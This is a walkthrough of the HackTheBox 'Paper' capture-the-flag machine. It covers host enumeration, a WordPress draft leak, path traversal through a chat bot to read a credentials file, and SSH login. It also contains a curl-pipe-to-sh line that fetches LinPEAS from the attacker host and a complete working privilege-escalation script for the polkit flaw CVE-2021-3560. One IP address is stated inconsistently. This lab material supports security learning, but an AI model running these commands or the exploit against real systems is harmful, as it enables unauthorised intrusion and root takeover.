HackTheBox Paper Writeup

Tackle the HackTheBox Paper Capture The Flag (CTF) challenge, an easy-level journey through web exploitation, subdomain enumeration, RCE, and privilege escalation. This concise writeup provides clear steps to help you develop essential Linux security skills through practical exercises.

Add Hosts#

Edit the /etc/hosts file and add the following entries:

10.10.11.143 paper.htb office.paper.htb chat.office.paper.htb

This ensures that your system can resolve the domain names paper.htb to the correct IP address 10.10.10.100.

Script to add hosts automatically#

ip="10.10.11.143"
domain="paper.htb office.paper.htb chat.office.paper.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping#

nmap -sCV paper.htb

Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-12 16:08 CEST
Nmap scan report for paper.htb (10.10.11.143)
Host is up (0.067s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
|   256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_  256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp  open  http     Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-title: HTTP Server Test Page powered by CentOS
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
443/tcp open  ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after:  2022-07-08T10:32:34
|_http-title: HTTP Server Test Page powered by CentOS
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_ssl-date: TLS randomness does not represent time
| http-methods: 
|_  Potentially risky methods: TRACE

Subdomain Enumeration#

While inspecting the traffic, the office.paper subdomain is discovered. Use gobuster to enumerate additional subdomains:

gobuster vhost -u office.paper -w /usr/share/dict/SecLists/Discovery/DNS/subdomains-top1million-110000.txt

Exploiting WordPress CVE-2019-17671#

Visit the following URL to exploit a known vulnerability in WordPress:

http://office.paper/?static=1

in it you can find http://chat.office.paper/register/xxxxxxxxxxxxxxxxx

Chat with the bot to explore further:

list ../../../home/dwight
file ../../../home/dwight/hubot/.env

Use the credentials found to SSH into the target:

ssh dwight@paper.htb
cat /home/dwight/user.txt

System Information Gathering with LinPEAS#

Run LinPEAS to gather information for privilege escalation:

wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
echo "now in the victim pc run -> curl "$(ip a | grep -A 2 "tun0:" | grep -oP '(?<=inet\s)\d+(\.\d+){3}')"/linpeas.sh | sh"
sudo python3 -m http.server 80
rm -rf linpeas.sh

Exploiting CVE-2021-3560 for Privilege Escalation#

Paste the following script into the shell to exploit the vulnerability:

RED='\033[0;31m'
GREEN='\033[0;32m'
BLUE='\033[0;34m'
NC='\033[0m'
USR="pwn"
PASS="root"
TIME=""
FORCE="y"
function fetch_timing(){
    exec 3>&1 4>&2
    out=$( { time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:$USR string:$USR int32:1 2>&1 >/dev/null 2>&4 1>&3; } 2>&1 )
    tmp=$(echo $out | grep -i "real" | awk -F '.' '{print $2}')
    tmp_timing=$(echo ${tmp:0:$((${#tmp}-10))})
    exec 3>&- 4>&-
    echo $tmp_timing  
}
function calculate_timing(){ 
    tmp_timing=$(echo $1)
    t=$(awk "BEGIN {print `echo $tmp_timing/2`}")
    echo $t
}
function insert_user(){
    time_fetched=$(fetch_timing)
    timing=$(calculate_timing `echo "0.$time_fetched"`)
    if [[ $TIME ]]; then
        t=$TIME
    else
        t=$timing
    fi
    while ! id "$USR" &>/dev/null; do
        dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:$USR string:$USR int32:1 2>/dev/null & sleep `echo $t`s 2>/dev/null; kill $! 2>/dev/null
    done
    uid=$(id $USR | cut -d = -f2 | cut -d \( -f1)
    echo $uid,$t
}
function insert_pass(){
    ti=$(echo $1)
    u_id=$(echo $2)
    hash1=$(openssl passwd -5 `echo -n $PASS`)
    while true; do
        dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User$u_id org.freedesktop.Accounts.User.SetPassword string:`echo -n $hash1` string:GoldenEye 2>/dev/null & sleep `echo $ti`s 2>/dev/null; kill $! 2>/dev/null
        if [ $? -eq 0 ]; then
            break
        fi
    done
}
function exploit(){
    while true; do
        echo -e "${BLUE}[!]${NC} Inserting Username $USR..."
        ret=$(insert_user)
        t=$(echo $ret | cut -d , -f2)
        uid=$(echo $ret | cut -d , -f1)
        if id "$USR" &>/dev/null; then
            echo -e "${GREEN}[+]${NC} Inserted Username $USR with UID $uid!"
            echo -e "${BLUE}[!]${NC} Inserting password hash..."
            insert_pass $t $uid
            echo -e "${BLUE}[!]${NC} Password insertion attempted!"
            echo -e "${BLUE}[!]${NC} Try to login as the injected user using 'su - $USR'"
            echo -e "${BLUE}[!]${NC} If login fails, run the exploit again."
            echo -e "${BLUE}[!]${NC} If successful, use 'sudo bash' to gain root access!"
            break
        else
            echo -e "${RED}[x]${NC} Insertion of Username failed! Retrying..."
        fi
    done
}
if [[ "$FORCE" == "y" ]]; then 
    exploit
else
    echo -e "${BLUE}[!]${NC} Starting Vulnerability Checks..."
    dist=$(cat /etc/os-release | grep ^ID= | cut -d = -f2 | grep -i 'centos\|rhel\|fedora\|ubuntu\|debian')
    echo -e "${BLUE}[!]${NC} Detected Linux distribution as $dist"
    ac_service=$(dpkg -l | grep -i accountsservice || rpm -qa | grep -i accountsservice)
    gc_center=$(dpkg -l | grep -i gnome-control-center || rpm -qa | grep -i gnome-control-center)
    if [[ $ac_service && $gc_center ]]; then
        echo -e "${GREEN}[+]${NC} Accounts service and Gnome-Control-Center Installation Found!"
        polkit=$(dpkg -l | grep -i polkit | grep -i "0.105-26" || rpm -qa | grep -i polkit | grep -i '0.11[3-9]')
        if [[ $polkit ]]; then
            echo -e "${GREEN}[+]${NC} Polkit version appears to be vulnerable!"
            exploit
        else
            echo -e "${RED}[x]${NC} ERROR: Polkit version is not vulnerable!"
            echo -e "${BLUE}[!]${NC} Aborting Execution!"
            echo -e "${BLUE}[!]${NC} Use '-f=y' flag to force exploit."
        fi
    else
        echo -e "${RED}[x]${NC} ERROR: Accounts service and Gnome-Control-Center NOT found!"
        echo -e "${BLUE}[!]${NC} Aborting Execution!"
    fi
fi

After exploiting, check the root flag:

cat /root/root.txt